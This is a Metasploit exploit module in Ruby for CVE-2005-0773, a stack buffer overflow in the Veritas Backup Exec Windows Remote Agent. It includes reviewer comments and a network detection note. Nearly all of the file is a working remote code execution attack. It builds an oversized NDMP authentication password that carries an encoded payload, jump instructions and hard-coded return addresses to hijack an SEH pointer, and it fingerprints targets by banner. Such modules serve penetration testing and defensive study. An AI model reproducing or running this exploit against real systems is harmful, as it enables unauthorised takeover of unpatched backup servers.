Path: blob/master/modules/exploits/windows/backupexec/remote_agent.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2005-0773 (see 'References' below): a stack buffer
# overflow in the Veritas Backup Exec Windows Remote Agent reached through an
# NDMP client-authentication request (authentication type 3) that carries an
# oversized password field.
#
# Detection note: everything this module puts on the wire is an ordinary NDMP
# exchange on the agent port (RPORT, default 10000 here). The distinguishing
# feature of the exploit traffic is the 8192-byte password inside a
# connect_client_auth (0x901) request with authentication type 3, which is
# what a network signature can key on. The module itself expects no valid
# reply after the request is sent (see the comment before the final
# ndmp_recv() in #exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Presumably supplies connect/disconnect, ndmp_send, ndmp_recv and
  # ndmp_info used below -- none of them are defined in this file.
  include Msf::Exploit::Remote::NDMP

  # Registers the module metadata: two targets that differ only in their
  # pair of return addresses ('Rets'), a 1024-byte payload space that must
  # avoid NUL bytes, and the agent port option (default 10000).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Veritas Backup Exec Windows Remote Agent Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the Veritas
        BackupExec Windows Agent software. This vulnerability occurs
        when a client authentication request is received with type
        '3' and a long password argument. Reliable execution is
        obtained by abusing the stack buffer overflow to smash a SEH
        pointer.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-0773'],
          [ 'OSVDB', '17624'],
          [ 'BID', '14022'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => %w{ win },
      # Each target carries two hard-coded addresses; #exploit writes
      # Rets[1] at the 10.0 offset and Rets[0] at the 9.0/9.1 offset.
      'Targets'        =>
        [
          [
            'Veritas BE 9.0/9.1/10.0 (All Windows)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x0140f8d5, 0x014261b0 ],
            },
          ],
          [
            'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x75022ac4, 0x75022ac4 ],
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2005-06-22'))

    register_options(
      [
        Opt::RPORT(10000)
      ])
  end

  # Banner-based version check. Reads the agent's NDMP info via ndmp_info()
  # and returns CheckCode::Appears (not Vulnerable -- a banner match does not
  # prove patch state) when the vendor string contains VERITAS and the
  # reported version is exactly "4.2" or "5.1"; anything else, including no
  # usable reply, is reported as Safe.
  #
  # NOTE(review): `^`/`$` are line anchors in Ruby, so the version match is
  # strict only because 'Version' is a single-line string; `\A`/`\z` would
  # be the whole-string form. NOTE(review): "4.2"/"5.1" are presumably the
  # agent's self-reported versions the author treated as vulnerable -- TODO
  # confirm how ndmp_info() derives 'Version' in the NDMP mixin.
  def check
    info = ndmp_info()
    if (info and info['Version'])
      # Leading space aligns the three labels in the output.
      vprint_status(" Vendor: #{info['Vendor']}")
      vprint_status("Product: #{info['Product']}")
      vprint_status("Version: #{info['Version']}")

      if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  # Sends one crafted connect_client_auth request and hands off to the
  # payload handler. In order: connect, read the agent's first message,
  # build a 512-byte username and an 8192-byte random alphanumeric
  # password, overlay the encoded payload and the two per-version address
  # sequences into the password, send the request, attempt (and expect to
  # fail) one read, run the handler, disconnect.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Read the agent's first message; the value is not used afterwards.
    resp = ndmp_recv()

    username = 'X' * 512
    password = rand_text_alphanumeric(8192)

    # Place our payload early in the request and jump backwards into it
    # (the payload is written so that it ends exactly at offset 3536, just
    # before the first overlay below; 'Space' => 1024 bounds its length).
    password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

    # This offset is required for version 10.0
    # (second address of the selected target's 'Rets' pair, packed as a
    # little-endian 32-bit value).
    password[3536, 2] = "\xeb\x06"
    password[3540, 4] = [ target['Rets'][1] ].pack('V')
    password[3544, 5] = "\xe9" + [-1037].pack('V')

    # This offset is required for version 9.0/9.1
    # (first address of the selected target's 'Rets' pair). Both overlays
    # are equal-length replacements, so password stays 8192 bytes.
    password[4524, 2] = "\xeb\x06"
    password[4528, 4] = [ target['Rets'][0] ].pack('V')
    password[4532, 5] = "\xe9" + [-2025].pack('V')

    # Create the authentication request
    # Wire layout: seven big-endian 32-bit header words, then a
    # length-prefixed username, a length-prefixed password and a trailing
    # 32-bit value 4. The 8192-byte password in a 0x901 request with
    # authentication type 3 is the on-the-wire feature a signature can
    # match.
    auth = [
      1, # Sequence number
      Time.now.to_i, # Current time
      0, # Message type (request)
      0x901, # Message name (connect_client_auth)
      0, # Reply sequence number
      0, # Error status
      3 # Authentication type
    ].pack('NNNNNNN') +
    [ username.length ].pack('N') + username +
    [ password.length ].pack('N') + password +
    [ 4 ].pack('N')

    print_status("Sending authentication request...")
    ndmp_send(auth)

    # Attempt to read a reply (this should fail)
    ndmp_recv()

    handler
    disconnect
  end
end